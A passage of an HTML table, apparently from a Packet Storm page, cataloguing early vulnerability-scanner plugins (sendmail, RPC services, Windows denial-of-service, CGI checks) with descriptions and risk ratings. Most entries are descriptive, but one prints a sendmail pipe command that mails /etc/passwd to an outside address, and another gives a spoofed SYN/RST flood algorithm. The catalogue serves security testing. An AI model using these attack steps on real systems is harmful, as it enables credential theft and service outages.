<tr><td>Attack</td><td>keyserv service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>llockmgr service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>nlockmgr service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>nsed service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>nsemntd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>rexd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>rje_mapper service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>rquotad service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>rstatd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>rusersd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>sched service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>selection service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>showfhd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>SNMP service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>sprayd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>statmon service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Sunlink mapper service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>tfsd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>walld service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ypbind service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>yppasswdd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ypupdated service</td><td></td><td></td><td>found by Avalon Security Research</td></tr>

<tr><td>Attack</td><td>ypxfrd service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail standard vulnerabilities tester</td><td>gets infos about sendmail</td><td>A lot of security holes have been found in sendmail</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail : 'debug' vulnerability tester</td><td>sendmail 'debug' exploit</td><td>On very old implementations of sendmail, the 'debug' option allow a remote user to execute arbitrary commands as root<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail 'decode' vulnerability tester</td><td>sendmail 'decode' exploit</td><td>If '/etc/aliases' contains "|/usr/bin/uudecode\decode, write to any file onwed by daemon, if they can connect to sendmail daemon, can write to any file owned by any user. <br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail supports EHLO</td><td>determines if the remote server supports EHLO greeting</td><td>The EHLO greeting indicates to sendmail to use ESMTP (Extended Simple Mail Transfer Protocol), which has additional vulnerabilities. Supporting it, and showing that sendmail supports it, may help an intruder to focus its efforts on a special weakness Risk factor : medium</td><td>distributed under the GPL</td></tr>

<tr><td>Information gathering</td><td>Sendmail EXPN</td><td>sendmail EXPN and VRFY exploit</td><td>Sendmail should not allow a remote user to perform EXPN or VRFY commands, since it can give away some interesting informations. This plugin determines if the remote sendmail allow those commands<br>Risk factor : low</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail HELO overflow</td><td>send anonymous mail</td><td>Some versions of sendmail have a bug that makes that mails sent by anybody who sent before a HELO string longer than about 1024 bytes wont have the additional info that sendmail stamps on the mail header such as the IP of the user who mailed it, the username of who did it and some more, because the long HELO name crops this info Risk factor : low</td><td>Javi Polo, GPL</td></tr>

<tr><td>Information gathering</td><td>Sendmail overwrite feature</td><td>send a mail to a file</td><td>Some versions of sendmail allow a remote user to send a mail directly to a non-root owned file. This feature can be used to overwrite a '.rhost' file of a user or whatever...<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Sendmail : mail from: <|program></td><td>use a pipe to make sendmail execute a program</td><td>Some versions of sendmail allow a remote user to use pipes in usernames, thus allowing him to execute remote commands as root. This exploit is very popular... A typical attack to get the password file is:<br> % telnet target.com 25 Trying 123.456.789.0... Connected to target.com Escape character is '^]'. 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 mail from: "|/bin/mail me@myhost.com < /etc/passwd\250 "|/bin/mail me@myhost.com < /etc/passwd\rcpt to: mickeymouse 550 mickeymouse... User unknown data 354 Enter mail, end with ".\. 250 Mail accepted quit Connection closed by foreign host. <br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>Serv-U 'CWD' denial of service</td><td>crashes a remote Serv-U FTP server</td><td>This plugin attempts to crash a remote Serv-U FTP server by issuing a CWD command with a long dir name Risk factor : High/Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>shell interpreter</td><td>determines if there are executables shells in the remote cgi-bin/</td><td>Leaving executable shells in the cgi-bin directory of the remote web server can enable users to execute arbitrary commands on the target machine as the UID of the web server. This check checks for the following shells in your cgi-bin directory : ash bash csh ksh sh tcsh zsh Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>slmail</td><td>buffer overflow for the SLMail SMTP server</td><td>SLMail SMTP server for WindowsNT buffer overflow exploit</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>smad</td><td>Prevents Sendmail from working properly</td><td>Sendmail accepts DoS attack This Linux specific attacks allows anyone to prevent sendmail from working properly In fact the simple algorithm proposed by Michal Zalewski can be performed in this way:<br>1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST (victim sends SYN/ACK to SPOOFHOST) 2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequence numbers (in reply to the SYN/ACK from victim). (victim got error on accept() - and enters 5 sec 'refusingconn' mode) 3. Wait approx. 2 seconds 4. Go to 1. This attack also works when SPOOFHOST = victim Risk factor : Medium/High</td><td>original code by Salvatore Sanfilippo [AntireZ]</td></tr>

<tr><td>Denial of Service</td><td>sping</td><td>denial of service using the ping of death</td><td>Cert Advisory CA-96.26 : The TCP/IP specification (the basis for many protocols used on the Internet) allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and 0 or more octets of optional information, with the rest of the packet being data. It is known that some systems will react in an unpredictable fashion when receiving oversized IP packets. Reports indicate a range of reactions including crashing, freezing, and rebooting.<br>In particular, the reports received by the CERT Coordination Center indicate that Internet Control Message Protocol (ICMP) packets issued via the "ping\subset of the TCP/IP suite of protocols that transmits error and control messages between systems. Two specific instances of the ICMP are the ICMP ECHO_REQUEST and ICMP ECHO_RESPONSE datagrams. These two instances can be used by a local host to determine whether a remote system is reachable via the network; this is commonly achieved using the "ping\Discussion in public forums has centered around the use of the "ping\command to construct oversized ICMP datagrams (which are encapsulated within an IP packet). Many ping implementations by default send ICMP datagrams consisting only of the 8 octets of ICMP header information but allow the user to specify a larger packet size if desired.<br>You can read more information about this vulnerability on Mike Bremford's Web page. (Note that this is not a CERT/CC maintained page. We provide the URL here for your convenience.)<br>http://www.sophist.demon.co.uk/ping/index.html</td><td>Jeff w.Roberson</td></tr>

<tr><td>Information gathering</td><td>SSH Insertion attack</td><td>checks for the version SSH protocol used on a remote machine</td><td>Older versions of the SSH protocol are vulnerable to an 'insertion attack' This means that an attacker with access to the encrypted SSH stream may insert encrypted blocks in the stream that will decrypt to arbitrary commands to be executed on the SSH server.<br>Risk factor: High</td><td>Discovered by CORE SDI S.A <http://www.core-sdi.com></td></tr>

<tr><td>Information gathering</td><td>Standard System holes</td><td>underlines little holes of a newly installed system</td><td>Underlines little holes of a newly installed system Most newly installed system have some 'standard' ports opens, that are no use to anyone except the intruders</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>statd</td><td>attempts to send a buffer overflow to statd</td><td>There's a bug on some 'statd' that allows a remote user to become root. Also, it is possible to create and remote any file on the remote system using this service Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>sunkill</td><td>performs a denial of service against a Solaris Workstation</td><td>This plugin performs a denial of service against a Solaris Workstation, by flooding it with ^D while negociating a telnet session</td><td>discovered by Jason Zapman II <zapman@CC.GATECH.EDU></td></tr>

<tr><td>Denial of Service</td><td>teardrop</td><td>fragments overlap denial of service</td><td>Some implementations of the TCP/IP IP fragmentation re-assembly code do not properly handle overlapping IP fragments. Teardrop is a widely available attack tool that exploits this vulnerability.<br>Risk factor : high</td><td>Copyright (c) 1997 route|daemon9 <route@infonexus.com></td></tr>

<tr><td>Information gathering</td><td>test-cgi</td><td>determines the presence of the 'test-cgi' cgi</td><td>Determination of the presence of the 'test-cgi' cgi</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>TFTP get file</td><td>Attempts to grab a via through tftp</td><td>The TFTP (Trivial File Transfer Protocol) allows remote user to read file withour having to log in. This may be a big security flaw, especially if tftpd (the TFTP server) is not well configured by the admin of the remote host Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>thttpd</td><td>determines if the remote thttpd allow anyone to read anything</td><td>Versions of the web server thttpd up to 2.03 (included) allow the remote intruders to read any files the thttpd server has the right to read, especially /etc/passwd<br>Risk factor : High</td><td>hole found by Mark Slemko <marcs@znep.com></td></tr>

<tr><td>Attack</td><td>Tooltalk presence check</td><td></td><td>CERT Advisory CA-98.11 : An implementation fault in the ToolTalk object database server allows a remote attacker to run arbitrary code as the superuser on hosts supporting the ToolTalk service. The affected program runs on many popular UNIX operating systems supporting CDE and some Open Windows installs</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>uploader.exe problem</td><td>uploads a file on the remote WebSite server</td><td>O'reilly's webserver 'website' contains a demopackage that contains the cgi-program uploader.exe. It's possible to use it to upload CGI-programs on the remote WebServer thus allowing an intruder to execute arbitrary commands remotely Platforms affected : WindowsNT, Windows95 Risk factor : High</td><td>found by Herman de Vette</td></tr>

<tr><td>Information gathering</td><td>uw_imapd buffer overflow</td><td>uw-imapd buffer overflow</td><td>CERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups.<br>All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable.<br>Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication.<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>view_source</td><td>determines the presence of the 'view-source' cgi</td><td>The 'view_source' cgi, shipped with some httpd distributions allow a remote user to view any file the httpd daemon has the right to read<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>webdist</td><td>determines the presence of the 'webdist' cgi</td><td>Determination of the presence of the 'webdist' cgi</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>webgais</td><td>determines the presence of the 'webgais' cgi</td><td>Determination of the presence of the 'webgais' cgi</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>websendmail</td><td>determines the presence of the 'websendmail' cgi</td><td>Determination of the presence of the 'websendmail' cgi</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>WFTP (Windows FTP server) login check</td><td>checks if WFTP accepts bogus logins</td><td>This plugin determines whether the remote ftp daemon accepts connections with any username/password, (ie : an old version of WFTP)</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>wingate</td><td>notifies the user whether wingate is running</td><td>This plugin notifies the user that wingate is installed on a remote machine</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>wingate DoS</td><td>performs a denial of service against a wingate server</td><td>Unsecured Wingates happily connect to themselves. When they run out of buffers, they prevent anyone from using them Platform affected : Windows Risk factor : Medium</td><td>found by Matt Carothers</td></tr>

<tr><td>Denial of Service</td><td>Wingate POP3 USER overflow</td><td>crash Wingate</td><td>Wingate can crash if a user telnet to port 110 (POP3) on a machine running Wingate and try to login as "USER x#9999[a lot of 9's]\Risk factor : high</td><td>Paco Brufal, GPL</td></tr>

<tr><td>Denial of Service</td><td>WindowsNT DNS flood denial</td><td>performs a denial of service against Windows NT DNS server</td><td>It is possile to crash some versions of WindowsNT DNS server by sending it a flood of characters The fix to this problem is in hotfixes-postSP3/dns-fix Risk factor : high</td><td>No copyright</td></tr>

<tr><td>Denial of Service</td><td>WindowsNT DNS QR denial</td><td>performs a denial of service against Windows NT DNS server</td><td>The WindowsNT DNS service terminates abnormally when it receives an answer to a DNS query that was never made So any remote user can ause a denial of service on the DNS server<br>Risk factor : high</td><td>No copyright</td></tr>

<tr><td>Denial of Service</td><td>winnuke</td><td>Windows denial of service using OOB msg on port 139</td><td>This plugin sends a message out of band to the port 139 of a Windows95 machine, and attempts to crash it</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>WINS udp flood</td><td>WINS denial of service</td><td>Some WINS server don't like to be flooded with UDP packets, thus giving up and stopping their service<br>Risk factor : High</td><td>adapted from Holas, Ondxej <OHolas@EXCH.DIGI-TRADE.CZ></td></tr>

<tr><td>Attack</td><td>pfdispaly</td><td>determines the presence of the 'wrap' cgi</td><td>WWW HTTP/1.0 Server, as shipped with IRIX 6.2 (at least in low end machines) includes a perl script (wrap) which allows anyone on the net to get a listing for any directory with mode +755. Risk factor : medium/high</td><td>found by J.A. Gutierrez</td></tr>

<tr><td>Information gathering</td><td>X11-Checker</td><td>Determines if there is an X11-Server with disabled access control of the remote system</td><td>Checks, if there is an open X11-Server<br>Risk factor : high</td><td>Sebastian Schreiber, GPL</td></tr>

<tr><td>Attack</td><td>Solaris Automountd exploit</td><td>Checks if automountd is enabled</td><td>There is a flaw in the Solaris rpc.statd and automountd which may allow an intruder to execute any command remotely as root. This plugin warns the user that automountd is enabled but **DOESN'T TEST IF THE VULNERABILITYIS PRESENT**. Risk factor : High</td><td>written after the advisory of Corruptio Optimi Pessima</td></tr>

<tr><td>Denial of Service</td><td>BNC overflow</td><td>overflows a buffer in a remote BNC server</td><td>Some older versions of BNC servers are vulnerable to a buffer overflow which may throw a shell account to an attacker running as the BNC uid The BNC server are usually used as iRC proxies This plugin attempts to connect on ports 9000 and 6666-6669 and sends a too long argument to the USER command. However, be warned that this plugin can be non-effective, since BNC can be run on any port. Risk factor : Medium/High</td><td>found by SDI http://www.sekure.org</td></tr>

<tr><td>Attack</td><td>Microsoft Personnal Web Server '.....'</td><td>Attempts to get the root listing of the remote web server</td><td>It is possible to list and download any file on a remote windows 95 host that has MS PWS installed by requesting '......' which will list the root directory Risk factor : high</td><td>discovered by Sean Coates <sean@SPATULA.ML.ORG></td></tr>

<tr><td>Attack</td><td>mSQL debug remote exploit</td><td>overflows a buffer in the remote msql server set to debug mode</td><td>An attacker may use mSQL to gain a shell remotely when the environment variable MSQL_DEBUG (for version 2.0) or MINERVA_DEBUG (for version 1.0) is set. mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname).<br>mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname).<br>mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname).<br>Risk factor : Medium/High</td><td>Sekure SDI Secure Coding Team</td></tr>

<tr><td>Attack</td><td>mSQL DBname remote exploit</td><td>overflows a buffer in the remote msql server</td><td>The mysqlInit() function can be passed too long args which will make a buffer overflow which may allow remote users to gain a shell remotely mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname).<br>mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname).<br>mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname).<br>Risk factor : Medium/High</td><td>Sekure SDI Secure Coding Team</td></tr>

<tr><td>Denial of Service</td><td>Lotus Notes MTA dos</td><td>makes the Lotus MTA crash</td><td>It is possible to crash the Lotus Notes MTA by sending it two HELO commands, both on the Solaris and Windows platform. An attacker can prevent the incoming mail from being delivered. Risk factor : Medium/High</td><td>found by Siva Sankar Adiraju <adirajus@HOTMAIL.COM></td></tr>

<tr><td>Information gathering</td><td>Sendmail redirection attack</td><td>check if specific message routing can be performed</td><td>Due to strange address parsing policy [briefly: if address ends with local hostname, trim it and parse as any other (even if after this operation address isn't 'local' anymore], specific message routing (eg. through internal, protected or external networks) can be forced, giving an occasion to perform anonymous scanning (or fakemailing). You could call it 'feature' instead of 'bug', but it seems to be Sendmail-specific ;> Simple fix - in /etc/sendmail.cf, at the top of ruleset 98, insert following line: R$*@$*@$* $#error $@ 5.7.1 $: "551 Sorry, no redirections.\<br>Risk factor : Low/Medium</td><td>Michal Zalewski <lcamtuf@IDS.PL></td></tr>

<tr><td>Denial of Service</td><td>IIS ftp server crash</td><td>crashes an IIS ftp server</td><td>It is possible to make the IIS FTP server close all the active connections by issuing a too long NLST command which will make the FTP server crash An attacker can use this to prevent people from downloading anything from your FTP server Risk factor: medium</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>oshare</td><td>crashes a Win98 computer</td><td>It is possible to crash a Windows 98 computer by sending it a badly formed packet. This plugin implements the oshare attack, the details of which can be found in the BugTraq archive Risk factor : High</td><td>original code by R00t Zer0</td></tr>

</table>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close